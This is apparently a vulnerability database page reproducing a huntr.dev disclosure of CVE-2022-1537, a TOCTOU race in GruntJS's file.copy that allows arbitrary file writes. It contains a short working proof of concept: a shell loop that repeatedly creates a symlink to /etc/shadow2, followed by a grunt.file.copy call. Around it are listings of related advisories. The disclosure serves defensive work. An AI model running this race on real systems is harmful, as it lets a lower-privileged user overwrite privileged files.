Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrHaxatron0179C3E5-BC02-4FC9-8491-A1A319B51B4D
HistoryApr 12, 2022 - 4:15 p.m.

file.copy operations in GruntJS are vulnerable to a TOCTOU race condition leading to arbitrary file write

2022-04-1216:15:32
haxatron
www.huntr.dev
22
gruntjs
vulnerability
race condition
symlink
arbitrary file write

EPSS

0

Percentile

5.1%

JSON

Description

file.copy operations in GruntJS are vulnerable to a TOC-TOU race condition leading to arbitrary file write when an attacker can create a symlink just after deletion of the dest symlink (by repeatedly calling ln -s /etc/shadow2 dest/shadow2 in a while loop) but right before the symlink is written to. I hypothesised this and mentioned this earlier in my last comment in my previous report but it remained unresolved, so I have managed to reproduce it in the following PoC:

Proof of Concept

1: As a lower-privileged user:

mkdir src
mkdir dest
echo "<overwrite shadow file here>" > src/shadow2
while true; do ln -s /etc/shadow2 dest/shadow2; done;

2: Now execute the following PoC:

grunt = require('grunt')
grunt.file.copy("src", "dest")

3: /etc/shadow2 is overwritten

<overwrite shadow file here>

Related

nessus 2
nvd 1
redhatcve 1
osv 4
openvas 2
debiancve 1
veracode 1
prion 1
debian 1
cve 1
cvelist 1
github 1
ubuntucve 1
ubuntu 1
ibm 1
nessus
nessus
Debian DLA-3383-1 : grunt - LTS security update
2023-04-05 00:00:00
Ubuntu 18.04 ESM / 20.04 ESM / 22.04 ESM : Grunt vulnerabilities (USN-5847-1)
2023-02-07 00:00:00
nvd
nvd
CVE-2022-1537
2022-05-10 14:15:08
redhatcve
redhatcve
CVE-2022-1537
2022-05-11 01:28:49
osv
osv
CVE-2022-1537
2022-05-10 14:15:08
grunt - security update
2023-04-05 00:00:00
Race Condition in Grunt
2022-05-11 00:01:37
openvas
openvas
Debian: Security Advisory (DLA-3383-1)
2023-04-06 00:00:00
Ubuntu: Security Advisory (USN-5847-1)
2023-02-08 00:00:00
debiancve
debiancve
CVE-2022-1537
2022-05-10 14:15:08
veracode
veracode
Time-of-check To Time-of-Use (TOCTOU)
2022-05-11 13:29:53
prion
prion
Race condition
2022-05-10 14:15:00
debian
debian
[SECURITY] [DLA 3383-1] grunt security update
2023-04-05 20:00:24
cve
cve
CVE-2022-1537
2022-05-10 14:15:08
cvelist
cvelist
CVE-2022-1537 file.copy operations in GruntJS are vulnerable to a TOCTOU race condition leading to arbitrary file write in gruntjs/grunt
2022-05-10 00:00:00
github
github
Race Condition in Grunt
2022-05-11 00:01:37
ubuntucve
ubuntucve
CVE-2022-1537
2022-05-10 00:00:00
ubuntu
ubuntu
Grunt vulnerabilities
2023-02-07 00:00:00
ibm
ibm
Security Bulletin: Multiple vulnerabilities found with third-party libraries used by IBM® MobileFirst Platform
2023-02-17 15:44:51

EPSS

0

Percentile

5.1%

JSON
Related for 0179C3E5-BC02-4FC9-8491-A1A319B51B4D
nessus2nvd1redhatcve1osv4openvas2debiancve1veracode1prion1debian1cve1cvelist1github1ubuntucve1ubuntu1ibm1